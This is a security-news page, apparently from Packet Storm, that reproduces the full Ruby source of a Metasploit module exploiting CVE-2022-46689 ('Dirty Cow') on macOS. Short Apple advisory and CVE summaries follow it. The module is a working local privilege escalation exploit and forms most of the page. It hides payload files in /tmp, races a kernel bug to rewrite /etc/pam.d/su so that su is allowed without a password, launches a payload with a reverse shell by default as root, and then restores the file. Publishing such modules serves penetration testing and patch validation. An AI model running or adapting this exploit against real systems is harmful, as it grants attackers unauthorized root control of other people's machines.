Security
Headlines
HeadlinesLatestCVEs

Headline

macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

Dirty Cow arbitrary file write local privilege escalation exploit for macOS.

Packet Storm
#mac#apple#git#auth
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Post::File  include Msf::Post::OSX::Priv  include Msf::Post::OSX::System  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'macOS Dirty Cow Arbitrary File Write Local Privilege Escalation',        'Description' => %q{          An app may be able to execute arbitrary code with kernel privileges        },        'License' => MSF_LICENSE,        'Author' => [          'Ian Beer', # discovery          'Zhuowei Zhang', # proof of concept          'timwr' # metasploit integration        ],        'References' => [          ['CVE', '2022-46689'],          ['URL', 'https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.61.2/tests/vm/vm_unaligned_copy_switch_race.c'],          ['URL', 'https://github.com/zhuowei/MacDirtyCowDemo'],        ],        'Platform' => 'osx',        'Arch' => ARCH_X64,        'SessionTypes' => ['shell', 'meterpreter'],        'DefaultTarget' => 0,        'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/shell_reverse_tcp' },        'Targets' => [          [ 'Mac OS X x64 (Native Payload)', {} ],        ],        'DisclosureDate' => '2022-12-17',        'Notes' => {          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES],          'Reliability' => [REPEATABLE_SESSION],          'Stability' => [CRASH_SAFE]        }      )    )    register_advanced_options [      OptString.new('TargetFile', [ true, 'The pam.d file to overwrite', '/etc/pam.d/su' ]),      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])    ]  end  def check    version = Rex::Version.new(get_system_version)    if version > Rex::Version.new('13.0.1')      CheckCode::Safe    elsif version < Rex::Version.new('13.0') && version > Rex::Version.new('12.6.1')      CheckCode::Safe    elsif version < Rex::Version.new('10.15')      CheckCode::Safe    else      CheckCode::Appears    end  end  def exploit    if is_root?      fail_with Failure::BadConfig, 'Session already has root privileges'    end    unless writable? datastore['WritableDir']      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"    end    payload_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"    binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)    upload_and_chmodx payload_file, binary_payload    register_file_for_cleanup payload_file    target_file = datastore['TargetFile']    current_content = read_file(target_file)    backup_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"    unless write_file(backup_file, current_content)      fail_with Failure::BadConfig, "#{backup_file} is not writable"    end    register_file_for_cleanup backup_file    replace_content = current_content.sub('rootok', 'permit')    replace_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"    unless write_file(replace_file, replace_content)      fail_with Failure::BadConfig, "#{replace_file} is not writable"    end    register_file_for_cleanup replace_file    exploit_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"    exploit_exe = exploit_data 'CVE-2022-46689', 'exploit'    upload_and_chmodx exploit_file, exploit_exe    register_file_for_cleanup exploit_file    exploit_cmd = "#{exploit_file} #{target_file} #{replace_file}"    print_status("Executing exploit '#{exploit_cmd}'")    result = cmd_exec(exploit_cmd)    print_status("Exploit result:\n#{result}")    su_cmd = "echo '#{payload_file} & disown' | su"    print_status("Running cmd:\n#{su_cmd}")    result = cmd_exec(su_cmd)    unless result.blank?      print_status("Command output:\n#{result}")    end    exploit_cmd = "#{exploit_file} #{target_file} #{backup_file}"    print_status("Executing exploit (restoring) '#{exploit_cmd}'")    result = cmd_exec(exploit_cmd)    print_status("Exploit result:\n#{result}")  endend

Related news

Apple Security Advisory 2022-12-13-8

Apple Security Advisory 2022-12-13-8 - watchOS 9.2 addresses bypass, code execution, integer overflow, out of bounds write, spoofing, and use-after-free vulnerabilities.

Apple Security Advisory 2022-12-13-7

Apple Security Advisory 2022-12-13-7 - tvOS 16.2 addresses bypass, code execution, integer overflow, out of bounds write, spoofing, and use-after-free vulnerabilities.

Apple Security Advisory 2022-12-13-6

Apple Security Advisory 2022-12-13-6 - macOS Big Sur 11.7.2 addresses bypass, code execution, and integer overflow vulnerabilities.

Apple Security Advisory 2022-12-13-5

Apple Security Advisory 2022-12-13-5 - macOS Monterey 12.6.2 addresses bypass, code execution, and integer overflow vulnerabilities.

Apple Security Advisory 2022-12-13-4

Apple Security Advisory 2022-12-13-4 - macOS Ventura 13.1 addresses bypass, code execution, out of bounds access, out of bounds write, spoofing, and use-after-free vulnerabilities.

Apple Security Advisory 2022-12-13-2

Apple Security Advisory 2022-12-13-2 - iOS 15.7.2 and iPadOS 15.7.2 addresses bypass, code execution, integer overflow, out of bounds write, and spoofing vulnerabilities.

Apple Security Advisory 2022-12-13-1

Apple Security Advisory 2022-12-13-1 - iOS 16.2 and iPadOS 16.2 addresses bypass, code execution, out of bounds write, spoofing, and use-after-free vulnerabilities.

CVE-2022-46702: About the security content of iOS 16.2 and iPadOS 16.2

The issue was addressed with improved memory handling. This issue is fixed in iOS 16.2 and iPadOS 16.2. An app may be able to disclose kernel memory.

CVE-2022-46700: About the security content of iOS 15.7.2 and iPadOS 15.7.2

A memory corruption issue was addressed with improved input validation. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution.

CVE-2022-46701: About the security content of macOS Ventura 13.1

The issue was addressed with improved bounds checks. This issue is fixed in iOS 16.2 and iPadOS 16.2, macOS Ventura 13.1, tvOS 16.2. Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges.

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution